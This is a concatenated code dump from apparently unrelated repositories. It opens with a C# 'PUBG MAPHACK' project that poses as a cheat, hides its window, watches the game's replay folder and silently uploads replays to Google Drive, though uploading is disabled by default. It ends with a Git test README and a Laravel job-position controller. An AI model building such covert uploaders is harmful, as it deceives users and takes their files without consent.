using (StreamWriter sw = File.AppendText(@"debug\debug.txt"))
{
sw.WriteLine(DateTime.Now.ToString("yyyy-MM-dd HH:mm") + " | " + message);
}
}
}
}
}
<file_sep>/PUBG MAPHACK/classes/GoogleDriveUploader.cs
using System;
using System.IO;
using System.Threading;
using System.IO.Compression;
using Google.Apis.Auth.OAuth2;
using Google.Apis.Auth.OAuth2.Flows;
using Google.Apis.Auth.OAuth2.Responses;
using Google.Apis.Drive.v3;
using Google.Apis.Services;
using Google.Apis.Util.Store;
namespace PUBG_MAPHACK
{
class GoogleDriveUploader
{
// If modifying these scopes, remember to generate new token
static string[] Scopes = { DriveService.Scope.DriveFile };
// ClientId & ClientSecret needs to be created at google developer console
static readonly ClientSecrets secrets = new ClientSecrets()
{
ClientId = "",
ClientSecret = ""
};
        // Refresh token is generated by generateNewToken() below
public string refreshToken = "";
public GoogleDriveUploader()
{
if (refreshToken == "" || secrets.ClientId == "" || secrets.ClientSecret == "")
{
System.Windows.Forms.MessageBox.Show("Google drive uploading is disabled - you need to create ClientId and ClientSecret in Google Developer Console. Check my GoogleDriveUploader class for more info.", "Developer helper", System.Windows.Forms.MessageBoxButtons.OK, System.Windows.Forms.MessageBoxIcon.Warning);
}
}
public void UploadFile(string path)
{
if (refreshToken == "" || secrets.ClientId == "" || secrets.ClientSecret == "")
{
return;
}
// Generate new google drive token (saved in token.json)
// Uncomment following line to generate new credentials for a google drive account (remember to comment out the predefined refresh token on line 31 first)
// UserCredential credential = generateNewToken();
// Authorize with predefined RefreshToken (RefreshTokens never expire on it's own)
UserCredential credential = AuthorizeWithRefreshToken(refreshToken);
// Zip directory before uploading to google drive
string zipFile = ZipDirectory(path);
// Make sure zip was successful before proceeding
if (!File.Exists(zipFile))
{
return;
}
Program.debug_log("Replay zipped and ready for upload");
// Create Drive API service.
var service = new DriveService(new BaseClientService.Initializer()
{
HttpClientInitializer = credential,
ApplicationName = "PUBG REPLAY UPLOADER",
});
// File information for google drive
var fileMetadata = new Google.Apis.Drive.v3.Data.File()
{
Name = Path.GetFileName(path) + ".zip",
MimeType = "application/zip, application/octet-stream, application/x-zip-compressed, multipart/x-zip"
};
FilesResource.CreateMediaUpload request;
Program.debug_log("Uploading replay");
// Do the actual file upload to google drive
using (var stream = new System.IO.FileStream(zipFile, System.IO.FileMode.Open))
{
request = service.Files.Create(fileMetadata, stream, "application/zip");
request.Fields = "id";
request.Upload();
}
// Recieve the response from google drive upload
var file = request.ResponseBody;
if(file.Id.Length > 0)
{
Program.debug_log("Upload complete");
} else
{
Program.debug_log("Upload failed");
}
// Cleanup after upload
if (File.Exists(zipFile))
{
File.Delete(zipFile); // Delete zip file
}
}
public UserCredential generateNewToken()
{
UserCredential credential;
// Delete existing token directory (saved where program is run from)
if (Directory.Exists("token.json"))
{
Directory.Delete("token.json", true);
}
// Generate new credentials (will open google drive login in browser)
credential = GoogleWebAuthorizationBroker.AuthorizeAsync(
new GoogleAuthorizationCodeFlow.Initializer { ClientSecrets = secrets },
Scopes,
"user",
CancellationToken.None,
new FileDataStore("token.json", true)).Result;
// Return credentials after signin
return credential;
}
private UserCredential AuthorizeWithRefreshToken(string token)
{
UserCredential credential;
// Get existing credentials using RefreshToken (can be found inside token.json after generating new token)
credential = new UserCredential(
new GoogleAuthorizationCodeFlow(
new GoogleAuthorizationCodeFlow.Initializer { ClientSecrets = secrets }
),
"user",
new TokenResponse
{
RefreshToken = token
});
// Return credentials
return credential;
}
private string ZipDirectory(string dirPath)
{
string zipPath = Path.GetTempPath() + Path.GetFileName(dirPath) + ".zip";
if (!File.Exists(zipPath) && Directory.Exists(dirPath))
{
// Create log file before zipping that shows if any funny stuff happened during match
string logPath = dirPath + @"\log.txt";
if (!File.Exists(logPath))
{
// Create a file to write to.
using (StreamWriter sw = File.CreateText(logPath))
{
sw.WriteLine(Program.triggerTracker);
}
}
Program.triggerTracker = "";
// Zip Directory
ZipFile.CreateFromDirectory(dirPath, zipPath);
}
return zipPath;
}
}
}
<file_sep>/PUBG MAPHACK/classes/ReplayMonitor.cs
using System;
using System.Threading;
using System.Threading.Tasks;
using System.IO;
namespace PUBG_MAPHACK
{
class ReplayMonitor
{
FileSystemWatcher watcher;
public GoogleDriveUploader GoogleDriveUploader = new GoogleDriveUploader();
public ReplayMonitor()
{
// Generate new google drive token (saved in token.json)
// GoogleDriveUploader.generateNewToken();
// Lets watch the pubg replay directory for filesystem changes
if (Directory.Exists(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Demos"))
{
watcher = new FileSystemWatcher();
watcher.Path = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + @"\TslGame\Saved\Demos";
watcher.NotifyFilter = NotifyFilters.DirectoryName;
watcher.Filter = "*.*";
watcher.Created += new FileSystemEventHandler(OnNewReplayCreation);
watcher.EnableRaisingEvents = true;
}
}
private void OnNewReplayCreation(object source, FileSystemEventArgs e)
{
if (Directory.Exists(e.FullPath))
{
/* Should probably make sure files are done being written to disk before starting
* the upload, but I'm too lazy to handle that, so let's just wait 5 seconds and hope it's done */
Thread.Sleep(5000);
Program.debug_log("Replay was created - Attemping upload now...");
// Let's upload newly created replay to google drive
var t = Task.Run(() => GoogleDriveUploader.UploadFile(e.FullPath));
}
}
}
}
<file_sep>/PUBG MAPHACK/forms/fake_cheat.cs
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public partial class fake_cheat : Form
{
public fake_cheat()
{
InitializeComponent();
}
}
}<file_sep>/PUBG MAPHACK/forms/hidden.cs
using System.Windows.Forms;
namespace PUBG_MAPHACK
{
public partial class hidden : Form
{
public hidden()
{
InitializeComponent();
this.WindowState = FormWindowState.Minimized;
this.ShowInTaskbar = false;
this.WindowState = FormWindowState.Normal; // Seems to do the trick in windows 8
}
}
}
|
de137f8cb2db42300a63bd62baa95691764261cc
|
[
"JavaScript",
"C#"
] | 9
|
JavaScript
|
metaversettt/pubg-maphack-master
|
9cc0f8fdb300f67cc639ea42e53b9dd51a607b90
|
f03c88f4b09f7cb1a62944f8061bb8bd11b2193f
|
refs/heads/master
|
<repo_name>tuankta20/ss6-m2<file_sep>/linkedlist/LinkedListMain.php
<?php
include_once "LinkedList.php";
$linkedList = new LinkedList();
$linkedList ->insertFirst(11);
$linkedList ->insertFirst(22);
$linkedList ->insertFirst(33);
$linkedList ->insertFirst(44);
$totalNode = $linkedList->totalNodes();
$linkData = $linkedList->readList();
echo $totalNode.'<br>';
echo implode('-', $linkData);<file_sep>/mylinkedlist/MyLinkedListTest.php
<?php
include_once "MyLinkedList.php";
$linkedList = new MyLinkedList();
$linkedList->insertFirst(22);
$linkedList->insertFirst(33);
$linkedList->insertLast(44);
$linkedList->insertLast(55);
$totalNode = $linkedList->totalNodes();
$linkData = $linkedList->readList();
echo $totalNode.'<br>';
echo implode('-', $linkData);
<file_sep>/mylinkedlist/MyLinkedList.php
<?php
include_once "Node.php";
class MyLinkedList
{
private $firstNode;
private $lastNode;
private $count;
public function __construct()
{
$this->firstNode = NULL;
$this->lastNode = NULL;
$this->count = 0;
}
public function insertFirst($data)
{
$link = new Node($data);
$link->next = $this->firstNode;
$this->firstNode = $link;
if ($this->lastNode == NULL) {
$this->lastNode = $link;
}
$this->count++;
}
public function insertLast($data)
{
if ($this->firstNode != NULL) {
$link = new Node($data);
$this->lastNode->next = $link;
$link->next = NULL;
$this->lastNode = $link;
$this->count++;
} else {
$this->insertFirst($data);
}
}
public function totalNodes()
{
return $this->count;
}
public function readList()
{
$listData = array();
$current = $this->firstNode;
while ($current != NULL) {
array_push($listData, $current->readNode());
$current = $current->next;
}
return $listData;
}
public function add($index, $element)
{
$i = 0;
$current = $this->firstNode;
while (++$i < $index) {
$current = $current->next;
}
$link = new Node($element);
$link->next = $current->next;
$current->next = $link;
$this->count++;
}
public function getList()
{
$listData = array();
$current = $this->firstNode;
while ($current != NULL) {
array_push($listData, $current->getData());
$current = $current->next;
}
return $listData;
}
public function getFirst()
{
return $this->firstNode->getData();
}
public function getLast()
{
return $this->lastNode->getData();
}
public function remove($index)
{
$i = 0;
$current = $this->firstNode;
while (++$i < $index) {
$current = $current->next;
}
$current->next = $current->next->next;
$this->count--;
}
public function removeObject($element)
{
$i = 0;
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
break;
}
$i++;
$current = $current->next;
}
$this->remove($i);
}
public function contains($element)
{
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
return "true";
}
$current = $current->next;
}
return "false";
}
public function indexOf($element)
{
$i = 0;
$link = new Node($element);
$current = $this->firstNode;
while ($current != NULL) {
if ($current->getData() == $link->getData()) {
return $i;
}
$i++;
$current = $current->next;
}
return "-1";
}
public function get($index)
{
$i = 0;
$current = $this->firstNode;
while ($i++ < $index) {
$current = $current->next;
}
return $current->getData();
}
}
|
08f01670ad233e46a135c4e9a0d36058019fecb1
|
[
"PHP"
] | 3
|
PHP
|
tuankta20/ss6-m2
|
c146fe33b904e5dc5202d286a65a2841c7edb351
|
75317df7e71aa02df4d25e7423b703b7df721991
|
refs/heads/master
|
<repo_name>UltimateCutlery/PirateScript<file_sep>/README.md
# PirateScript
JavaScript starter pack for the 'Pirate Script' assignment
## Task
- Open the file called `piratescript.js`
- Write a function that encodes a given input into pirate talk.
- For each word:
- If the word is 'pounds', change this to pirate currency -> 'doubloons'
- If the word is a number, leave this unchanged
- Otherwise, take the first letter and move this to the end of the word and then add/append 'arr' to the end
### Example
```javascript
console.log( piratize( "hello" ) ); // returns "elloharr"
console.log( piratize( "hello world") ); // returns "elloharr orldwarr"
console.log( piratize( "pizza costs 20 pounds" ) ); // returns "izzaparr ostscarr 20 doubloons"
```
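For reference, here is a minimal sketch of one way the rules above could be implemented. It assumes words are separated by single spaces and that a "number" means an all-digit token; the regex and structure are illustrative, not the required solution.
```javascript
// Minimal sketch, assuming space-separated words and all-digit tokens as numbers.
function piratize(input) {
  return input
    .split(" ")
    .map(function (word) {
      if (word === "pounds") return "doubloons"; // pirate currency
      if (/^\d+$/.test(word)) return word;       // numbers are left unchanged
      return word.slice(1) + word[0] + "arr";    // move first letter to the end, append 'arr'
    })
    .join(" ");
}

console.log(piratize("pizza costs 20 pounds")); // "izzaparr ostscarr 20 doubloons"
```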
### Test Notes
If you want to test the code for yourself before submitting, paste your code into the ScratchPad (https://dash.projectfunction.io/scratchpad)
### Submission Notes
Once you have completed the task, simply push your changes back to the repository for this assignment. After the submission deadline, only the latest push will be considered. Happy Piratin'! Arrrrr!<file_sep>/test.js
it('return "elloharr" when input is "hello"', () => {
expect(piratize('hello')).toEqual('elloharr');
});
it('return "elloharr orldwarr" when input is "hello world"', () => {
expect(piratize('hello world')).toEqual('elloharr orldwarr');
});
it('return "izzaparr ostscarr 20 doubloons" when input is "pizza costs 20 pounds"', () => {
expect(piratize('pizza costs 20 pounds')).toEqual('izzaparr ostscarr 20 doubloons');
});
it('return "Iarr maarr trandedsarr ithwarr aarr umsarr foarr 4000 doubloons orthwarr foarr oldgarr endsarr elpharr" when input is "I am stranded with a sum of 4000 pounds worth of gold send help"', () => {
expect(piratize('I am stranded with a sum of 4000 pounds worth of gold send help')).toEqual('Iarr maarr trandedsarr ithwarr aarr umsarr foarr 4000 doubloons orthwarr foarr oldgarr endsarr elpharr');
});
|
1f11d0e59ff34abf26ff3ad463e6178ba3e1af35
|
[
"Markdown",
"JavaScript"
] | 2
|
Markdown
|
UltimateCutlery/PirateScript
|
02568d9e6c353e43345364e5308df4e8e777116c
|
fc73d6c75c12e1eed546fd7dc094ce6a0a0de1c4
|
refs/heads/master
|
<file_sep>using System.Collections;
using System.Collections.Generic;
using UnityEngine;
using UnityEditor;
using UnityEditorInternal;
using VRCSDK2;
[CustomEditor(typeof(VisemeCreator))]
public class AutoAssignVisemes : Editor
{
private string labelText =
"This script assumes you are using visemes generated by CATs.\nThey should all start with 'vrc.v_'.";
VisemeCreator obj;
public void OnEnable()
{
obj = (VisemeCreator)target;
}
public override void OnInspectorGUI()
{
GUILayout.Label(labelText);
if (!GUILayout.Button("Find and add visemes."))
return;
DoEverything();
}
Transform avatar = null;
private SkinnedMeshRenderer avatarMesh = null;
private VRC_AvatarDescriptor avatarDescriptor = null;
string animationPath;
string exportPath;
private bool findAvatarAndAnimationPath(Transform cur)
{
// Find the avatar root
string path = "";
do
{
if (cur.GetComponent<VRCSDK2.VRC_AvatarDescriptor>() != null)
{
avatar = cur;
avatarMesh = cur.GetComponentInChildren<SkinnedMeshRenderer>();
if (avatarMesh == null)
{
Debug.LogError("No skinned mesh renderer found");
}
//Debug.Log("Mesh found: Blendshape count - " + avatarMesh.sharedMesh.blendShapeCount);
avatarDescriptor = cur.GetComponent<VRC_AvatarDescriptor>();
break;
}
if (path.Length > 0)
path = cur.name + "/" + path;
else
path = cur.name;
cur = cur.parent;
} while (cur != null);
if (avatar != null)
{
animationPath = path;
Debug.Log("Animation path:" + animationPath);
return true;
}
return false;
}
private void Cleanup()
{
// Remove this script from the avatar so that VRC is happy.
DestroyImmediate(obj.gameObject.GetComponent<VisemeCreator>());
}
private void DoEverything()
{
try
{
if (!findAvatarAndAnimationPath(obj.transform))
{
Debug.LogError("Could not find Avatar Descriptor component.");
return;
}
if (avatarDescriptor.lipSync != VRC_AvatarDescriptor.LipSyncStyle.VisemeBlendShape)
{
avatarDescriptor.lipSync = VRC_AvatarDescriptor.LipSyncStyle.VisemeBlendShape;
avatarDescriptor.VisemeSkinnedMesh = avatarMesh;
labelText = "Lipsync style was not set to Viseme Blend Shape.\nClick again to assign blendshapes.";
return;
}
AssignBlendshapes();
Debug.Log("Viseme Creator - All done!");
Cleanup();
}
catch (System.Exception ex)
{
Debug.Log("An error occured. Likely because you do not have a mesh selected.");
}
}
private void AssignBlendshapes()
{
var VRC_Visemes = avatarDescriptor.VisemeBlendShapes;
for (int i = 0; i < avatarMesh.sharedMesh.blendShapeCount; i++)
{
var blendshapeName = avatarMesh.sharedMesh.GetBlendShapeName(i);
switch (blendshapeName)
{
case "vrc.v_sil":
VRC_Visemes.SetValue(blendshapeName, 0);
break;
case "vrc.v_pp":
VRC_Visemes.SetValue(blendshapeName, 1);
break;
case "vrc.v_ff":
VRC_Visemes.SetValue(blendshapeName, 2);
break;
case "vrc.v_th":
VRC_Visemes.SetValue(blendshapeName, 3);
break;
case "vrc.v_dd":
VRC_Visemes.SetValue(blendshapeName, 4);
break;
case "vrc.v_kk":
VRC_Visemes.SetValue(blendshapeName, 5);
break;
case "vrc.v_ch":
VRC_Visemes.SetValue(blendshapeName, 6);
break;
case "vrc.v_ss":
VRC_Visemes.SetValue(blendshapeName, 7);
break;
case "vrc.v_nn":
VRC_Visemes.SetValue(blendshapeName, 8);
break;
case "vrc.v_rr":
VRC_Visemes.SetValue(blendshapeName, 9);
break;
case "vrc.v_aa":
VRC_Visemes.SetValue(blendshapeName, 10);
break;
case "vrc.v_e":
VRC_Visemes.SetValue(blendshapeName, 11);
break;
case "vrc.v_ih":
VRC_Visemes.SetValue(blendshapeName, 12);
break;
case "vrc.v_oh":
VRC_Visemes.SetValue(blendshapeName, 13);
break;
case "vrc.v_ou":
VRC_Visemes.SetValue(blendshapeName, 14);
break;
default:
break;
}
}
}
}
<file_sep># AutoVisemeAssigner
Quick and dirty 30 minute job to see if it works.
Some code used from https://github.com/theepicsnail/Marker
|
6da3f095d1bb8ec5a4b98d3ff4fa701706d375e7
|
[
"Markdown",
"C#"
] | 2
|
C#
|
kaaori/AutoVisemeAssigner
|
9f042ef77f3519dec259acf6d4c077a108dc25bf
|
c99d8d52e1058b4564feb1967b7eaacf51056f23
|
refs/heads/main
|
<repo_name>Susko35/RMA-DZ-3<file_sep>/listview/app/src/main/java/com/susnjara/listview/NameClickListener.java
package com.susnjara.listview;
public interface NameClickListener {
void onNameClick(int position);
}
<file_sep>/listview/app/src/main/java/com/susnjara/listview/NameActivity.java
package com.susnjara.listview;
import android.app.Activity;
import android.app.Notification;
import android.content.Intent;
import android.os.Bundle;
import android.view.View;
import android.widget.Button;
import android.widget.TextView;
import java.util.ArrayList;
public class NameActivity extends Activity {
private TextView textView;
private Button buttonName;
private View.OnClickListener onClickListener;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_name);
setupData();
}
private void setupData(){
textView = findViewById(R.id.textViewName);
buttonName = findViewById(R.id.buttonName);
onClickListener = new View.OnClickListener() {
@Override
public void onClick(View v) {
clicked();
}
};
Intent startIntent = this.getIntent();
if(startIntent.hasExtra(MainActivity.KEY_INPUT)){
textView.setText(startIntent.getStringExtra(MainActivity.KEY_INPUT));
}
buttonName.setOnClickListener(onClickListener);
}
private void clicked(){
Intent backIntent = new Intent(getApplicationContext(), MainActivity.class);
this.startActivity(backIntent);
}
}
<file_sep>/listview/app/src/main/java/com/susnjara/listview/MainActivity.java
package com.susnjara.listview;
import androidx.appcompat.app.AppCompatActivity;
import androidx.recyclerview.widget.LinearLayoutManager;
import androidx.recyclerview.widget.RecyclerView;
import android.content.Intent;
import android.os.Bundle;
import android.util.Log;
import java.util.ArrayList;
import java.util.List;
public class MainActivity extends AppCompatActivity implements NameClickListener{
public static final String KEY_INPUT = "input data";
private static final String TAG = "MainActivity";
private RecyclerView recyclerView;
private List<String> dataList;
private CustomAdapter customAdapter;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
setupData();
setupRecyclerView();
}
private void setupData(){
dataList = new ArrayList<>();
dataList.add("prvo ime");
dataList.add("drugo ime");
dataList.add("trece ime");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("ListView");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("<NAME>");
dataList.add("Zadaca lv 3");
dataList.add("setupData");
dataList.add("setupRecyclerView");
dataList.add("Lkrterr ajjsjw");
}
private void setupRecyclerView(){
recyclerView = findViewById(R.id.recyclerView);
recyclerView.setLayoutManager(new LinearLayoutManager(this));
customAdapter = new CustomAdapter(dataList, this);
recyclerView.setAdapter(customAdapter);
}
@Override
public void onNameClick(int position){
Log.d(TAG, "onNameClick: int position" + position);
Log.d(TAG, dataList.get(position));
Intent intent = new Intent(getApplicationContext(), NameActivity.class);
intent.putExtra(KEY_INPUT, dataList.get(position));
this.startActivity(intent);
}
}
|
799e19ef6450c201c75841330163db94f8a9616e
|
[
"Java"
] | 3
|
Java
|
Susko35/RMA-DZ-3
|
7f52839f6e03291f28ee82a9242cdd196f7ba366
|
c031f8cf3d79781d561c342e3118edcab15dc690
|
refs/heads/master
|
<file_sep># Thread-demo
Asynchronously loading a progress bar
<file_sep>package com.qingshangzuo.thread_demo;
import android.os.AsyncTask;
import android.support.v7.app.AppCompatActivity;
import android.os.Bundle;
import android.util.Log;
import android.view.View;
import android.widget.ProgressBar;
import android.widget.TextView;
import java.lang.ref.WeakReference;
public class MainActivity extends AppCompatActivity {
private static final String TAG = "MainActivity";
TextView textView;
ProgressBar progressBar;
MyAsyncTask myAsyncTask;
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
textView = findViewById(R.id.textView);
progressBar = findViewById(R.id.progressBar);
}
static class MyAsyncTask extends AsyncTask<Integer,Integer,Integer>{
WeakReference<MainActivity> weakReference;
public MyAsyncTask(MainActivity activity){
weakReference = new WeakReference<MainActivity>(activity);
}
@Override
protected void onPreExecute() {
super.onPreExecute();
MainActivity activity = weakReference.get();
if(activity != null) activity.progressBar.setProgress(0);
Log.d(TAG,"onPreExecute");
}
@Override
protected Integer doInBackground(Integer... integers) {
int sum = 0;
for(int i = 1;i < 100;i++){
try{
Log.d(TAG,"doInBackground:" + Thread.currentThread().getName());
Thread.sleep(100);
}catch (InterruptedException e){
e.printStackTrace();
}
sum += i;
publishProgress(i);
if(isCancelled()) break;
}
return -1;
}
@Override
protected void onProgressUpdate(Integer... values) {
super.onProgressUpdate(values);
Log.d(TAG,"onProgressUpdate:");
MainActivity activity = weakReference.get();
if(activity != null){
activity.textView.setText("progress" + values[0]);
activity.progressBar.setProgress(values[0]);
}
}
@Override
protected void onPostExecute(Integer integer) {
super.onPostExecute(integer);
Log.d(TAG,"onPostExecute");
MainActivity activity = weakReference.get();
if(activity != null){
activity.textView.setText("congratulation !!! finished");
activity.progressBar.setProgress(0);
}
}
}
public void calculate(View v) {
myAsyncTask = new MyAsyncTask(this);
myAsyncTask.execute(0);
}
protected void stop() {
myAsyncTask.cancel(true);
}
}
|
9b532342baddd1f34eaaa123ab0468765bfc3087
|
[
"Markdown",
"Java"
] | 2
|
Markdown
|
luckilyswl/Thread
|
4134fb71fd8e9c35a185acec1066a6d97e614bf3
|
9be0282453ad32244ef7e73ee5b9fe8fa27809f6
|
refs/heads/master
|
<repo_name>johnpmayer/wearelearned<file_sep>/app.js
function todo() {
alert('ToDo');
}
angular.module('app',['$strap.directives'])
.service('Mode', function() {
var that = this;
this.mode = 'concept',
this.setMode = function(mode) {
that.mode = mode;
}
})
.directive('optiontitle', function() {
return {
restrict: 'E',
transclude: false,
scope: true,
controller: function($scope, $attrs) {
$scope.title = $scope[$attrs.title];
$scope.options = $scope[$attrs.options];
},
templateUrl: 'templates/optiontitle.html'
};
})
.controller("Main", function($scope) {
$scope.search = function(){
alert($scope.searchString);
}
// Fake Data:
$scope.conceptName = "Hydrogen bonds";
$scope.dependencies = ["Electrostatic forces", "Electron geometry", "A topic with an extremely long name"];
$scope.dependants = ["Freezing point of water", "DNA"];
$scope.explanations = [
{
author: 'Mary',
votes: 130,
text: "fo sfjhbs khb zc afgfjhgs jydg ckjyzgx jhvb kajsfg kasjfbg kasjgsadfhbg iasdhf laiuhv liae7fy8 hk,jebf la89sf yqkjb ,kjfbsf 9asgf fb o dub dsal ju dsfads fyf jyd hjafkhjd fjhgf kasdgkdjh gasdk casd kj bar baz"
},
{
author: 'John',
votes: 70,
text: "foo bar baz asduyf gakhfvkasdh gsdhgc ksahc sdhcsahg kashgsakdhkasg asdkhfgaksdjhg dsfh sdkfjhg sadfkjhg asdfkjh sadhjg askdfhg sdfh sdkjfh asdkflieufbas,jfg owiefb asdjkhg asdilug s,mncbs,djchb sjfbasdmfb ;lsaufdfg .asukdfsbf. sdf usdyvf"
},
];
})
.controller("LeftSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'dependencies')
? "open" : "closed";
$scope.layout = ($scope.status == "open")
? "span3"
: "span1";
}
$scope.close = function(){
Mode.setMode('concept');
}
$scope.open = function(){
Mode.setMode('dependencies');
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("RightSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'dependants')
? "open" : "closed";
$scope.layout = ($scope.status == "open")
? "span3"
: "span1";
}
$scope.close = function(){
Mode.setMode('concept');
}
$scope.open = function(){
Mode.setMode('dependants');
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("MiddleSize", function($scope, Mode) {
$scope.Mode = Mode;
var updateLayout = function(mode) {
$scope.status = (mode == 'concept')
? "full" : "sidebar";
$scope.layout = ($scope.status == "full")
? "span10"
: "span8";
}
$scope.$watch("Mode.mode", function(newVal, oldVal) {
updateLayout(newVal);
}, true);
})
.controller("Dependency", function($scope) {
$scope.menuOptions = [{name:'Explore',callback:todo}];
})
.controller("Dependant", function($scope) {
$scope.menuOptions = [{name:'Explore',callback:todo}];
})
.controller("ConceptTitle", function($scope) {
$scope.menuOptions = [{name:'Contribute',callback:todo}];
})
.controller("Explanation", function($scope) {
$scope.menuOptions = [{name:'Comment', callback:todo}];
})
.controller("DocumentMgr", function($scope) {
$scope.modal = {
"title":"Create a new Document",
"import":"",
"saved":true,
}
$scope.conceptSearch = function(query, callback) {
callback(["a","b","c"]);
}
$scope.newDocument = {
"text" : "",
"dependencies" : [],
}
})
<file_sep>/server/makefile
BUILDOPTS=--ghc-options=-O0
all: src/Main.hs
cabal build ${BUILDOPTS}
<file_sep>/server/run.sh
#!/usr/bin/ksh
./dist/build/server/server
|
1424e4dfdc88cd0cb52f248354e7d561f3922756
|
[
"JavaScript",
"Makefile",
"Shell"
] | 3
|
JavaScript
|
johnpmayer/wearelearned
|
3e61c542732d05c9908325ffd625e36c4be2ec6f
|
dc43b02f80e6d1e637e7dec88edd49b73840d5dd
|
refs/heads/master
|
<repo_name>SamirSaji/Api-Hitting-Sender<file_sep>/app.js
const express = require("express");
const app = express();
const bodyparser = require("body-parser");
const axios = require("axios");
app.use(bodyparser.json());
app.post("/", (req, res) => {
res.send("sender page");
});
const posts = async () => {
const generateRandomTex = () => {
let data = {};
for (let i = 0; i < 10; i++) {
let a = Math.random()
.toString(36)
.substr(2, 8);
let b = Math.random()
.toString(36)
.substr(2, 8);
data[`${a}`] = b;
}
return data;
};
await axios({
method: "post",
url: "http://localhost:5000/",
data: generateRandomTex()
})
.then(function(response) {
console.log(response.status);
console.log(response.config.data);
data = {};
})
.catch(function(error) {
console.log(error);
});
};
setInterval(async () => {
const completeLoop = async () => {
for (let i = 0; i < 50; i++) {
await posts();
console.log(
"----------------------------------------------------------------------------------------------"
);
}
};
completeLoop().then(() => {
console.log(
"-------------------------------------------------------------WORK FLOW FINISHED-------------------------------------------"
);
});
}, 5000);
app.listen(3000);
console.log("running sender port 3000");
|
edd9722ae1851ad7ce2ae9585a79da8ef3fd95cd
|
[
"JavaScript"
] | 1
|
JavaScript
|
SamirSaji/Api-Hitting-Sender
|
1903645597cf5be48e63a899eebf02e0e19af5b1
|
8c8b8c884c3c3a227189843d5999548292c862e5
|
refs/heads/master
|
<repo_name>namxg6626/HIT-reactjs<file_sep>/src/App.js
import React from "react";
import { Button, Row, Alert } from "antd";
import { ModalCounter } from "./components";
import "antd/dist/antd.css";
import "./App.css";
export default class App extends React.Component {
state = {
isModalVisible: false,
countValue: null,
};
closeModal = () => {
this.setState({ isModalVisible: false });
};
openModal = () => {
this.setState({ isModalVisible: true });
};
handleOk = (val) => {
this.closeModal();
this.setState({ countValue: val });
};
render() {
return (
<div className="app">
{this.state.isModalVisible && (
<ModalCounter
visible={this.state.isModalVisible}
onOk={(countValue) => this.handleOk(countValue)}
>
<Alert
type="success"
message="Lorem ipsum dolor sit amet consectetur adipisicing elit. Error dolore doloremque laborum dicta vel tempore!"
/>
</ModalCounter>
)}
<Row justify="center">
<Button onClick={() => this.openModal()} type="primary">
Hit me :D !
</Button>
</Row>
<Row justify="center">
{this.state.countValue && <p>Count value: {this.state.countValue}</p>}
</Row>
</div>
);
}
}
|
0cf0d3c75cf93a500d7c0e437f35566fa7372b8b
|
[
"JavaScript"
] | 1
|
JavaScript
|
namxg6626/HIT-reactjs
|
ccc8580746cf7f77241ea02727bdc95c4a16c4cc
|
96562a9e52478c4c369a658b436a5a650119aa75
|
refs/heads/master
|
<file_sep># Git_Test
Git_Test_Repo
<file_sep>
intermediate work
New changes are made in this file
|
2b34625d11b519e6b32b6995dad933625809107c
|
[
"Markdown",
"C"
] | 2
|
Markdown
|
pradpare/Git_Test
|
cc13c8156e7f78facf914bf0fb7b5a2da2a47a00
|
88706c107b70d0fb3a5a170207f3ff24ce855009
|
refs/heads/master
|
<file_sep><?php
namespace App\Http\Controllers\backend;
use Illuminate\Foundation\Bus\DispatchesJobs;
use Illuminate\Routing\Controller as BaseController;
use Illuminate\Foundation\Validation\ValidatesRequests;
use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
use App\Http\Controllers\Controller;
use Illuminate\Http\Request;
use DB;
use Illuminate\Support\Str;
class AddjobpositionController extends Controller
{
use AuthorizesRequests, DispatchesJobs, ValidatesRequests;
public function insertposition(Request $req)
{
$position_name = (isset($_POST['position_name'])) ? $_POST['position_name'] : '0';
$location = (isset($_POST['location'])) ? $_POST['location'] : '0';
$job_descriptions = (isset($_POST['job_descriptions'])) ? $_POST['job_descriptions'] : '0';
$job_type = (isset($_POST['job_type'])) ? $_POST['job_type'] : '0';
$education = (isset($_POST['education'])) ? $_POST['education'] : '0';
$experiences = (isset($_POST['experiences'])) ? $_POST['experiences'] : '0';
$attributes = (isset($_POST['attributes'])) ? $_POST['attributes'] : '0';
$gender = (isset($_POST['gender'])) ? $_POST['gender'] : '0';
$age = (isset($_POST['age'])) ? $_POST['age'] : '0';
$saraly = (isset($_POST['saraly'])) ? $_POST['saraly'] : '0';
$request = (isset($_POST['request'])) ? $_POST['request'] : '0';
$job_post_date = (isset($_POST['job_post_date'])) ? $_POST['job_post_date'] : '0';
$user_id = $_GET['user_id'];
// dd($user_id);
$status = 2 ;
$date_entry = date('Y-m-d');
$data = array(
'position_name' => $position_name,
'location' => $location,
'job_descriptions' => $job_descriptions,
'job_type' => $job_type,
'education' => $education,
'experiences' => $experiences,
'attributes' => $attributes,
'gender' => $gender,
'age' => $age,
'saraly' => $saraly,
'request' => $request,
'job_post_date' => $job_post_date,
'user_id' => $user_id,
'status' => $status,
'date_entry' => $date_entry
);
// dd($data);
$res1 = DB::table('tbl_position')->insert($data);
// dd($res1);
if ($res1){
$msg = " ส่งข้อมูลสำเร็จ";
$url_rediect = "<script>alert('".$msg."'); window.location='jobposition';</script> ";
}else{
$msg = " ส่งข้อมูลไม่สำเร็จ";
$url_rediect = "<script>alert('".$msg."');</script> ";
}
echo $url_rediect;
}
public function addjobpositionindex(Request $req){
// return '<h1>test : '.$user_id.'</h1>';
$user_id=$req->user_id;
// dd($user_id);
$list=$this->prov();
return view('backend.addjobposition',compact(
'list',
'user_id'
));
}
